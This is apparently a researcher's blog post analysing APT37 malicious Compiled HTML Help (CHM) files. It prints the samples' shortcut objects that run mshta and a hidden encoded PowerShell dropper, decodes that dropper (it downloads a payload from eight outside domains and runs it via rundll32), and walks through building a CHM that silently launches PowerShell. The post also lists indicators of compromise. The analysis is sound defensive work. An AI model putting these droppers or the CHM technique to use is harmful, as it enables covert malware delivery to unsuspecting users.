Description
Monkey See Monkey Do, I wonder how the CHiMpanzee drool.
I have came across a few tweets in the past week with CHM
file being used as part of an attack chain which I had no knowledge about. Therefore, this post is used to explore some samples to find out a little more about Compiled HTML Help files
A.K.A HTMLHelp
. Additionally, to better understand, I have also documented a method to replicate one of the samples to spawn a calculator instead.
What is CHM
CHM is a file format consisting of collection of HTML pages. It is also an archive of files. It is a Microsoft-proprietary format used to deliver โhelpโ like documentation, tutorials and other resources. All of these are packed into a single compressed file which are commonly used in software help documentation.
We can also recognize chm
files via the header value ITSF
. From the hex dump, we can also see some HTML files which would be part of the Table of Contents.hhc.
The following shows example files from the malware sample listed in the sample overview.
Commands
This section explores at least two methods of usage of commands in chm
files for delivering malware payload in an attack chain.
Running MSHTA.exe - (APT37)
Letโs look at the first example used by APT37.
Sample Overview
The following chm
is present in VirusTotal which is used by APT37.
Name | SHA256 |
---|---|
pay_202201_5_02-10424.chm | 9fdc4b3d6fbccc1abd8a08acd52b6380627e350faa99fcc348e5ed366c7b37af |
Extracted Archive
The following shows some of the items that were found in this compressed file. We can also make use of HTTP Help Workshop Tool to โdecompileโ as well. You can do so by clicking on File > decompile
to set the compiled help file and the output location to place the extracted files.
An Attack Chain by APT37
The attack chain diagram is taken from ZScalarโs post.
Table of Contents.hhc
This .hhc
file is used to define the table of contents and navigation for a CHM
file. This gives structure, potentially URLs or file links which leads to malicious resources. We can read more about the contents from Microsoft documentation.
Here is what is in the Table of Contents.hhc
file:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<OBJECT type="text/site properties">
<param name="FrameName" value="1">
<param name="Window Styles" value="0x800025">
<param name="ImageType" value="Folder">
</OBJECT>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="Start">
<param name="Local" value="Start.html">
</OBJECT>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="Main">
<param name="Local" value="Main.html">
</OBJECT>
</UL>
</BODY></HTML>
Start.html
This is the first file that gets rendered. The Command
here is ShortCut
. A Button
object with id x
is created as a button which handles the shortcut. One of the item being a command to run mshta.exe
to execute the 9.html
. Unfortunately, I am not able to find the original 9.html
on VirusTotal. However, that gives a really good idea about how chm
files are used as part of the chain when delivering malware.
<HTML>
<TITLE> ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ </TITLE>
<HEAD>
</HEAD>
<BODY>
<H1 align=center> ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ </h1>
<br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",mshta.exe,http://attiferstudio.com/install.bak/sony/9.html ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
x.Click();
location.href="Main.html";
</SCRIPT>
</BODY>
</HTML>
Suspicious Network IOC
Domain | Port |
---|---|
attiferstudio.]com/install.]bak/sony/9.]html | 80 |
This domain is marked as malicious by Mandiant. |
According to Shortcut | Microsoft Learn:
Note
Creates a shortcut to a specified action by passing Windows-based messages and parameters. For example, if a topic discusses a procedure that involves a specific dialog box, you can provide a link that a user can click in the topic to open the dialog box in the program.
The following shows the output in FakeNet
tool
11/13/24 11:59:48 PM [ HTTPListener80] GET /install.bak/sony/9.html HTTP/1.1
11/13/24 11:59:48 PM [ HTTPListener80] Accept: */*
11/13/24 11:59:48 PM [ HTTPListener80] Accept-Language: en-SG
11/13/24 11:59:48 PM [ HTTPListener80] UA-CPU: AMD64
11/13/24 11:59:48 PM [ HTTPListener80] Accept-Encoding: gzip, deflate
11/13/24 11:59:48 PM [ HTTPListener80] User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
11/13/24 11:59:48 PM [ HTTPListener80] Host: attiferstudio.com
11/13/24 11:59:48 PM [ HTTPListener80] Connection: Keep-Alive
11/13/24 11:59:48 PM [ HTTPListener80]
Main.html
This file contains the JavaScript Payload obfuscated which can be de-obfuscated with https://obf-io.deobfuscate.io/.
We can see a stark difference between the obfuscated and de-obfuscated code.
Obfuscated Code
De-obfuscated
The string array here give hints that there are further encoding end decoding that needs to be done. Furthermore, there seem to be some cryptographic operations performed as well as some hints of this sample being a download. It seems to also deal with different browser types and has different ways to deal with download blob data. As de-obfuscation isnโt the main focus, I wonโt be dealing with it here.
Copyright(C) 2014 rimesoft.com
string looks interesting but I have found just one available entry on Google.
http://windowfin.com/bbs/board.php/board.php?bo_table=windowfin&wr_id=592329 links to windowsexeAllkiller.com. This domain is hosted in Kakao Corp.
The hash there seems legitimate according to Virustotal - ec386aa4a8e53033f92b80291c51e8b4. Furthermore, we see the neolook@gmail.]com
string as well in the full string listing.
Full _0x11db
String Array
var _0x11db = ["str2bin", "bin2str", "hex2bin", "bin2hex", "encode64", "decode64", "UTF8Decode", "UTF8Encode", "insertJS", "length", "charCodeAt", "", "fromCharCode", "0x", "indexOf", "0X", "substring", "replace", "floor", "slice", "0", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "charAt", "split", "join", "=", "\n", "head", "getElementsByTagName", "script", "createElement", "type", "text/javascript", "text", "appendChild", "hostname", "location", "protocol", "host", "pathname", "callLicense", "checkLicense1", "checkLicense2", "aaa", "bbb", "ccc", "ddd", "a : ", ", b : ", ", c : ", ", d : ", "innerHTML", "rime_jsguard_license", "getElementById", "Copyright(C) 2014 rimesoft.com. All rights reserved.", "rime_jsguard_licenseCheck", "By Sim,Jaehoon <[email protected]", "getDay", "Today is Sunday", "Today is Monday", "Today is Tuesday", "Today is Wednesday", "Today is Thursday", "Today is Friday", "Today is Saturday", "demo", "0123456789abcdef", "sha256", "sha256_self_test", "message digest", "f7846f55cf23e14eebeab5b4e1550cad5b509e3348fbc4efa3a1413d393cb650", "keySize", "numberOfRounds", "masterKey", "encRoundKeys", "decRoundKeys", "(Error)setupEncRoundKeys1 : Wrong Key Size.", "(Error)setupEncRoundKeys2 : Wrong Key.", "(Error)setupDecRoundKeys1 : Wrong Key Size.", "(Error)setupDecRoundKeys2 : Wrong Key.", "(Error)encrypt : Wrong Key Size.", "(Error)encrypt : Wrong Key.", "(Error)decrypt : Wrong Key Size.", "(Error)decrypt : Wrong Key.", "ceil", " ", "* ", " \n", "object", "number", "string", "concat", "Error: Wrong Key Size5.", "(Error)setKey : Wrong Key.", "getKeySize", "encrypt", "CBC", "ECB", "decrypt", "LITTLE", "BIG", "ENDIAN", "(Error)setupRoundKeys1 : Wrong Key Size.", "(Error)setupRoundKeys2 : Wrong Key.", "(Error)encryptSeed1 : Wrong Key Size.", "(Error)encryptSeed2 : Wrong Key.", "(Error)decryptSeed1 : Wrong Key Size.", "(Error)decryptSeed2 : Wrong Key.", "SEED ERR 001", "SEED ERR 002", "SEED ERR 003", "/", "//", "COPYRIGHT", "Co", "pyr", "ig", "ht(", "C) 2", "1", "4 ri", "me", "so", "ft.co", "m. A", "ll r", "igh", "ts re", "ser", "ve", "d.", "PROCESS", "substr", "<!-- -->", "<!--LIC_TO RIMESOFT-->", "unisafe_smail_process", "<!--LIC_TO", "unisafe_attach_process", "unisafe_smail_process_online_v01", "์๋ฒ ์ ์ ์ ๋ณด๊ฐ ์์ต๋๋ค.\n์ ์์ ์ธ ๋ณด์ ๋ฉ์ผ์ด ์๋๋๋ค.", "unisafe_attach_process_online_v01", "&hash_data=", "&jsoncallback=?", "Result", ",", "OK", "์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(03).\n", "neolook_test==>", "์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(02).\n", "์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(01).\n", "(์์ ๋ ๊ฐ์ด ์์)", "getJSON", "%20", "abort", "์ธํฐ๋ท์ ์ฐ๊ฒฐ๋์ด ์์ง ์์ ๊ฒฝ์ฐ ๋ณด์๋ฉ์ผ ์ด๋์ด ๋ถ๊ฐ๋ฅํฉ๋๋ค.", "match", "userAgent", "application/octet-stream", "safari", "toLowerCase", "chrome", "Safari์ ๊ฒฝ์ฐ ์ด๋ฆ์ ๋ณ๊ฒฝํ ์ ์์ผ๋ฉฐ,\n", "์ฌ์ฉ์์ ๋ค์ด๋ก๋ ํด๋์ Unknown ๋๋ Unknown-์ซ์ ํ์์ผ๋ก ์ ์ฅ๋ฉ๋๋ค.\n\n", "์๋ฃ ํ ๋ค์ด๋ก๋ ํด๋์ Unknown ํ์ผ์ \n", "[ ", " ]๋ก\n", "๋ฐ๊พผ ๋ค์ ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค.\n\n", "[์ฃผ์ : ํฐ ํ์ผ(3MB ์ด์)์ผ ๊ฒฝ์ฐ safari๊ฐ ๋ค์ด๋ ์ ์์ต๋๋ค.]", "application/octet-stream;base64,", "data:", "a", "download", "setAttribute", "href", "display", "style", "none", "onclick", "target", "removeChild", "body", "MouseEvent", "createEvent", "click", "initEvent", "dispatchEvent", "BlobBuilder", "WebKitBlobBuilder", "MozBlobBuilder", "MSBlobBuilder", "name", "TypeError", "append", "getBlob", "InvalidStateError", "unsupported browser", "msSaveBlob", "navigator", "Download File", "webkitURL", "firefox", "createObjectURL", "URL", "SEED-CBC", "write", "128"];
Translations
์๋ฒ ์ ์ ์ ๋ณด๊ฐ ์์ต๋๋ค.\n์ ์์ ์ธ ๋ณด์ ๋ฉ์ผ์ด ์๋๋๋ค.
- There is no server connection information. This is not legitimate secure mail.
์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(03).
- The value received from the server is not normal (03).
์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(02).
- The value received from the server is not normal (02).
์๋ฒ๋ก๋ถํฐ ๋ฐ์ ๊ฐ์ด ์ ์์ ์ด์ง ์์ต๋๋ค(01)
- The value received from the server is not normal (01)
(์์ ๋ ๊ฐ์ด ์์)
- (no value received)
์ธํฐ๋ท์ ์ฐ๊ฒฐ๋์ด ์์ง ์์ ๊ฒฝ์ฐ ๋ณด์๋ฉ์ผ ์ด๋์ด ๋ถ๊ฐ๋ฅํฉ๋๋ค.
- If youโre not connected to the internet, you canโt view your secure mail.
Safari์ ๊ฒฝ์ฐ ์ด๋ฆ์ ๋ณ๊ฒฝํ ์ ์์ผ๋ฉฐ,
- For Safari, you canโt rename it,
์ฌ์ฉ์์ ๋ค์ด๋ก๋ ํด๋์ Unknown ๋๋ Unknown-์ซ์ ํ์์ผ๋ก ์ ์ฅ๋ฉ๋๋ค.
- It is saved in the userโs Downloads folder in an Unknown or Unknown-number format.
์๋ฃ ํ ๋ค์ด๋ก๋ ํด๋์ Unknown ํ์ผ์
- After completion, move the Unknown file in the Downloads folder to the
๋ฐ๊พผ ๋ค์ ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค.
- before using it.
[์ฃผ์ : ํฐ ํ์ผ(3MB ์ด์)์ผ ๊ฒฝ์ฐ safari๊ฐ ๋ค์ด๋ ์ ์์ต๋๋ค.]
- [Caution: large files (3MB or more) may cause safari to crash].
Different Sample, Same IOC by ZScalar
In this analysis, the same suspicious IOC was also used which is attributed to APT37
which targets South Korean Entities. Blog by ZScalar has included many chm
hashes that we can reference as well.
Their chm
file also downloads a similar filename 9.html
.
Here is another example of a help window showing text in Korean and getting from same domain but a 10.html
.
Running Powershell.exe
Letโs look at another example where instead of using mshta.exe
, it made use of powershell commands to run encoded scripts.
Sample Overview
The following chm
is present in VirusTotal which is used by APT37.
Name | SHA256 |
---|---|
README-yD8348.chm) | 4e52c186ef4cbfc9249cd03416f17825138b449bcaddd7b79fe9a89b898d67fd |
From the content preview, we can some sus html files. They are propagandising.htm
and the README-yD8348.hhc
which is the structure for chm
.
README-yD8348.hhc
This masquerades as a help documents that gives instruction on some IP settings.
Here is the content in the
.hhc
file.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 Advanced IP Settings Tab">
<param name="Local" value="README-yD8348.htm">
</OBJECT>
</UL>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 Advanced WINS Tab">
<param name="Local" value="propagandising.htm">
</OBJECT>
</UL>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 Alternate Configuration Tab">
<param name="Local" value="README-yD8348.htm">
</OBJECT>
</UL>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 and IPv6 Advanced DNS Tab">
<param name="Local" value="propagandising.htm">
</OBJECT>
</UL>
</BODY>
</HTML>
README-yD8348.htm
The propagandising.htm
does not seem to contain anything suspicious. However, the README-yD8348.htm
contains Button
objects with Command to a ShortCut
similar to what we have seen previously.
Encoded Command
This chunk of encoded command contains the 8 attacker domains addresses.
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<BODY>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAQQBuAG4AZQB4AGUAZABNAGEAbQBpAGwAbABhACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AbQByAGMAcgBpAHoAcQB1AG4AYQAuAGMAbwBtAC8ATAA3AGMAYwBOAC8AegBkAHAAMQBYAHYAQwBiADYALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AQQBHAEkAZgA3AGgAQQB1AGcALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwBpADYAdAA5AGcAdQBwACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwBjAGoAOABvAFUATgAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcgBsAGEAZAB2AG8AZwBhAGQAYQB0AHIAaQBiAHUAdABhAHIAaQBhAC4AYwBvAG0ALwB0AHYAbgBxADkALwBzAGkAZQA4ADcALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwB6AG4AbABRAGYAUgBqAGoAOQBFAHcAaQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8AQQA3AHIAaQBYADMAMAB5AHUALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwB6AGQAegB0AEsARgBDAEgAMQBIACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG0AZQByAGMAdQByAGkAZAAgAGkAbgAgACQAQQBuAG4AZQB4AGUAZABNAGEAbQBpAGwAbABhACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABtAGUAcgBjAHUAcgBpAGQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHcAYQB5AGYAYQByAGUAcgBzAEMAbwBvAHAAdABlAGQALgBhAG4AZQBtAG8AbgBpAG4AUABhAHIAYQBiAG8AbABpAHoAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAHcAYQB5AGYAYQByAGUAcgBzAEMAbwBvAHAAdABlAGQALgBhAG4AZQBtAG8AbgBpAG4AUABhAHIAYQBiAG8AbABpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgAzAEEARwBFAEEAZQBRAEIAbQBBAEcARQBBAGMAZwBCAGwAQQBIAEkAQQBjAHcAQgBEAEEARwA4AEEAYgB3AEIAdwBBAEgAUQBBAFoAUQBCAGsAQQBDADQAQQBZAFEAQgB1AEEARwBVAEEAYgBRAEIAdgBBAEcANABBAGEAUQBCAHUAQQBGAEEAQQBZAFEAQgB5AEEARwBFAEEAWQBnAEIAdgBBAEcAdwBBAGEAUQBCADYAQQBHAFUAQQBMAEEAQgBOAEEARwA4AEEAZABBAEIAawBBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAfQB9AA==">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced IP Settings Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced IP Settings Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>
<p><b>IP addresses</b> lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:</p>
...
...
The decoded PowerShell command is as follows:
Start-Sleep -Seconds 5;
$AnnexedMamilla = (
"https://mrcrizquna.com/L7ccN/zdp1XvCb6,https://nayadofoundation.org/wXaKm/AGIf7hAug,https://gsscorporationltd.com/okSfj/i6t9gup,https://hotellosmirtos.com/sjn/cj8oUN,https://carladvogadatributaria.com/tvnq9/sie87,https://zainco.net/OdOU/znlQfRjj9Ewi,https://citytech-solutions.com/6Mh1k/A7riX30yu,https://erg-eg.com/ocmb/zdztKFCH1H").split(",");
foreach ($mercurid in $AnnexedMamilla) {
try {
wget $mercurid -TimeoutSec 15 -O $env:TEMP\wayfarersCoopted.anemoninParabolize
if ((Get-Item $env:TEMP\wayfarersCoopted.anemoninParabolize).length -ge 100000) {
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXAB3AGEAeQBmAGEAcgBlAHIAcwBDAG8AbwBwAHQAZQBkAC4AYQBuAGUAbQBvAG4AaQBuAFAAYQByAGEAYgBvAGwAaQB6AGUALABNAG8AdABkADsA";
break;
}
}
catch {
Start-Sleep -Seconds 5;
}
}
Suspicious Network IOC
- hxxps://mrcrizquna.]com/L7ccN/zdp1XvCb6
- hxxps://nayadofoundation.rg/wXaKm/AGIf7hAug
- hxxps://gsscorporationltd.]com/okSfj/i6t9gup
- hxxps://hotellosmirtos.]com/sjn/cj8oUN
- hxxps://carladvogadatributaria.].com/tvnq9/sie87
- hxxps://zainco.]net/OdOU/znlQfRjj9Ewi
- hxxps://citytech-solutions.]com/6Mh1k/A7riX30yu
- hxxps://erg-eg.]com/ocmb/zdztKFCH1H
FakeNet
captures this and indicated signs of powershell.exe
as well.
Running Downloaded Malware using rundll32
The inner powershell
command to execute is:
start rundll32 $env:TEMP\wayfarersCoopted.anemoninParabolize,Motd;
Steps for Creating our own CHM file
CHM
can be created with the help of HTML Help Workshop
which can be downloaded from internet archive. Note that this downloaded file may be flagged by Windows Defender as a threat.
1. Create New Project
We can first start out by creating a new Project. I will name this project Fake IT HelpDesk
.
When creating a new project, realize that we can have different types of file. I found that we can just skip this unless we have something done up already which we donโt.
We will then be greeted with the following User Interface.
2. Creating a new Help Page
We can now create a new page by going to File > New > HTML File
. I have set the name of the page to IT Help Desk
.
Letโs edit this script with anything you want. After that, we can save the file. I will be replacing with the following content and saving as help.htm
:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
<Title>IT HelpDesk</Title>
<style>
body {
text-align: center;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
line-height: 1.6;
color: #333;
background-color: #f0f4f8;
margin: 0;
padding: 0;
}
.container {
max-width: 800px;
margin: 0 auto;
padding: 20px;
}
header {
background-color: #1a237e;
color: white;
text-align: center;
padding: 1em 0;
margin-bottom: 2em;
}
h1 {
margin: 0;
}
.concept {
background-color: white;
border-radius: 8px;
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
margin-bottom: 2em;
overflow: hidden;
}
.concept-header {
background-color: #3949ab;
color: white;
padding: 1em;
}
.concept-content {
padding: 1em;
}
.concept h2 {
margin: 0;
}
.concept p {
margin-bottom: 0;
}
</style>
</HEAD>
<BODY>
<header>
<h1>Understanding HTTP</h1>
</header>
<div class="container">
<div class="concept">
<div class="concept-header">
<h2>What is HTTP?</h2>
</div>
<div class="concept-content">
<p>HTTP (Hypertext Transfer Protocol) is the foundation of data communication on the World Wide Web. It's a protocol that allows for the transfer of data between a client (usually a web browser) and a server.</p>
</div>
</div>
<div class="concept">
<div class="concept-header">
<h2>HTTP Methods</h2>
</div>
<div class="concept-content">
<p>HTTP defines several request methods to indicate the desired action to be performed on the identified resource. The most common methods are GET (retrieve data), POST (submit data), PUT (update data), and DELETE (remove data).</p>
</div>
</div>
<div class="concept">
<div class="concept-header">
<h2>HTTP Status Codes</h2>
</div>
<div class="concept-content">
<p>HTTP status codes are three-digit numbers returned by a server in response to a client's request. They are grouped into five classes: Informational responses (100โ199), Successful responses (200โ299), Redirects (300โ399), Client errors (400โ499), and Server errors (500โ599).</p>
</div>
</div>
<div class="concept">
<div class="concept-header">
<h2>HTTP Headers</h2>
</div>
<div class="concept-content">
<p>HTTP headers allow the client and the server to pass additional information with the request or the response. They define the operating parameters of an HTTP transaction. Common headers include Content-Type, User-Agent, and Authorization.</p>
</div>
</div>
</div>
</BODY>
</HTML>
3. Adding Topics
We can now add topic by clicking on the annotated button and add in the help.htm
file.
You can continue to create more new pages and add it as topics in this step. I shall leave it for now. We should now be able to find the help.htm
under the [FILES]
section.
4. Adding to Table Of Content (TOC)
We can now click on the Contents
tab. After that, we can select the Create a new contents file
since we do not have any existing one. This is the hhc
file just like discussed earlier. We can rename this to anything but the default seems to be Table of Contents.hhc
. I will save it as the default.
5. Adding the ShortCut
We can now click on the HTML Help ActiveX Control
button. This is where you can create or modify the Command that we have discussed earlier.
We can select ShortCut
in the command dropdown and for this post, we wonโt be using any scripting to access the command so Iโll just leave it.
I have selected the type to HIDDEN
For this program, I have set up a fake python server to run a PowerShell script to run calc.exe
similar to the second example.
This are the inputs:
Program
:cmd.exe
Parameters
:/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=
- โStart-Process calc.exeโ in Unicode
Next, we can leave the Message
, WPARAM
and LPARAM
empty for now and click Next , then Finish.
We should now see the new Object being added into the source automatically at where your cursor was.
Note
We can then call the function
Click
on that created button
// <id_of_button>.Click()
<script> hhctrl.Click()</script>
6. Compilation
To compile, click File > compile
7. Execution
Now, we can look for our Fake_IT_HelpDesk.chm
file and run it. In Windows 11 at least, it would warn it we wish to view blocked content.
Letโs just assume that the user allowed to view blocked content due to compelling reason, we should see the calculator spawned!
Looking at our Newly Created CHM
Letโs look at the archive:
We see our hhc
file which should contain the structure for the compressed folder. Next, the help.htm
is also present!
References
- What is CHM and Why Isnโt It Dead Yet
- CHM - Compiled HTML Help File Format
- https://learn.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/contents
- https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt3
Annex A - Indicators Of Compromise (IOCs) by ZScalar
Lifted from: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt3
Archive file hashes
MD5 hash | Archive filename |
---|---|
3dd12d67844b047486740405ae96f1a4 | (20220120)2022๋ ์ด๋์ฐฝํ ์ ๋ ์ธ์ฌ001.rar |
e9cd4c60582a587416c4807c890f8a5b | (์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).rar |
6dc7795dde643aae9ced8e22db335ad1 | 1.rar |
e3879ea3f695706dfc3fc1fb68c6241d | 2017-APEC.rar |
17bc6298bf72fa76ad6e3f29536e2f13 | 2022 ํ๊ธฐ ์ -ํธ์ ์ ๋ชจ์ง์๊ฐ.rar |
54a99efd1b9adec5dc0096c624f21660 | 2022-01-27-notification.rar |
f3f4cf7876817b1e8a2d49fe9bd7b206 | 2022-03-22.rar |
bb182e47e1ffc0e8335b3263112ffdb1 | 2022-04-14.rar |
9d85c8378b5f1edefb1e9837b3abb74f | 2022.04.27.rar |
cb33ef9c824d16ff23af4e01f017e648 | 2022.rar |
75fe480a0669e80369eaf640857c27cd | 20220315-112_Notice.rar |
6db5f68b74c8ba397104da419fcc831d | 202203_5_06.rar |
cfd73942f61fbb14dded15f3d0c92f4a | 20220510_115155.rar |
5c67c9266e4267d1bf0862bf2c7bd2a5 | 20220913.rar |
1531bba6a8028d38d36c0a91b91159c3 | 20220916093205755684_TSA.rar |
afdc59ec36ac950de08169162783accd | 2022๋ ๊ตญ๋ฐฉ๋ถ ๋ถ์์ด์ฌ ์๋ด(๋ชฝ๊ณจ๋ฆฌ์).rar |
06c112968cdde43c3424bdf0a2a00928 | 20230302_Guide.rar |
6ab401c83095129a182b9be0359d602d | 3์ฌ๋ณต์ง์ ๋ฌด.rar |
93e94b673c6d1ea6d615c0102dc77610 | Ambassador Schedule Week 6 2023.rar |
e32f59fd5acbe01d2171ba6c2f24e3ca | Announcement.rar |
7b60dc663e1025e8892b96fa9fc34f00 | BoanMail.rar |
5e95023c6ac3f3fefe00cfc2b4b1d093 | CR_20230126.rar |
353370ade2a2491c29f20f07860cf492 | CV.rar |
120a677df1c4d1f0792b6547d3b60183 | DBLife-2022_08_05.rar |
02baa23f3baecdc29d96bffea165191b | Details.rar |
c3325c43b6eea2510f9c9f1df7b7ce22 | Documents.rar |
04a7290e04fd1855140373aa3d453cef | DriverSet.rar |
87c3e8e4308aac42fed82de86b0d4cb6 | Estimate.rar |
328dc6e7acce35abaaf3811bac2bc838 | H2O ๊ฒฌ์ ์.rar |
e9230cf7615338ab037719646d67351b | HealthDoc.rar |
cf012ca48b5e1f6743be7e0d10cdfd2e | Introduce.rar |
34d3e5306cff0bfe831ccd89d095ef33 | Invoice_1514_from_Evo3_Marketing_Inc.rar |
717dab257423d5fd93d0d02f3ff242e7 | KB_20220111.rar |
0164d8a2d27cfd312fb709c60c351850 | KB_20230126.rar |
c23c17756e5ccf9543ea4fb9eb342fde | KN0408_045 ์ ์ํธ.rar |
31793153b12f1187287007578017abd4 | KakaoTalk_20220419_103447534.rar |
